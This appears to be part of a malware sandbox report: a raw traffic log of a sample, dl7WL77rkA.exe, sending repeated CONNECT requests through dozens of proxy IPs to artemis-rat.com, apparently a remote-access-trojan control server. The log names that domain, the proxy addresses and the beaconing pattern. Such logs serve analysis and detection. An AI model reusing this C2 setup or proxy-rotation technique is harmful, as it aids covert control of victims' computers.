                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.342081070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.514656067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:00.514803886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2070192.168.2.55233737.187.77.58598703876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.273166895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.014292002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.014746904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.014609098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2071192.168.2.5554748.217.143.187156733876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.280672073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2072192.168.2.55433075.89.101.62803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.281331062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2073192.168.2.555221193.239.58.9280813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.281975031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2074192.168.2.55546736.93.157.4956783876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.282391071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2075192.168.2.55547245.11.95.16552123876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.284962893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2076192.168.2.55547345.11.95.16560103876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.286489964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2077192.168.2.55547531.170.22.12710803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.316241026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2078192.168.2.55434388.202.230.10388963876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.317468882 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.342178106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2079192.168.2.55527593.190.142.57265413876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.332149982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.628355026 CET226INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:48 GMT
                                                                                                                                                                                                                                                            Content-Length: 101
                                                                                                                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                            Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 65 36 39 34 64 34 34 37 65 39 64 33 32 38 34 32 37 31 38 38 66 37 33 33 62 31 34 62 36 39 38 35 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/e694d447e9d328427188f733b14b6985


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2080192.168.2.55547837.221.197.165803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.341423035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.207223892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.202048063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.092732906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.889710903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2081192.168.2.555476123.116.119.175813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.364264011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2082192.168.2.555300190.97.238.949993876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.372075081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.405121088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.499180079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:00.499080896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2083192.168.2.555470124.163.236.5473023876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.383127928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.867661953 CET90INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Length: 55


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2084192.168.2.552537162.214.227.68567963876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.386817932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.405124903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.499177933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:00.499174118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2085192.168.2.555306207.180.198.241558233876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.405489922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.207530022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.202070951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.202111006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:56.202016115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:00.092756033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:03.904932976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2086192.168.2.55525631.24.44.92506873876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.406302929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.592293978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.702177048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:00.702512980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2087192.168.2.55526951.75.126.150646153876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.407030106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.592293978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.702173948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2088192.168.2.555301207.180.198.241457183876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.409204006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.207550049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.202069998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.202070951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:56.202024937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:00.092804909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
